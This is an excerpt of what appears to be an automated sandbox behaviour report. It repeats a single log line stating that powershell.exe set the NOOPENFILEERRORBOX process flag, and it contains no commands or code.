                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
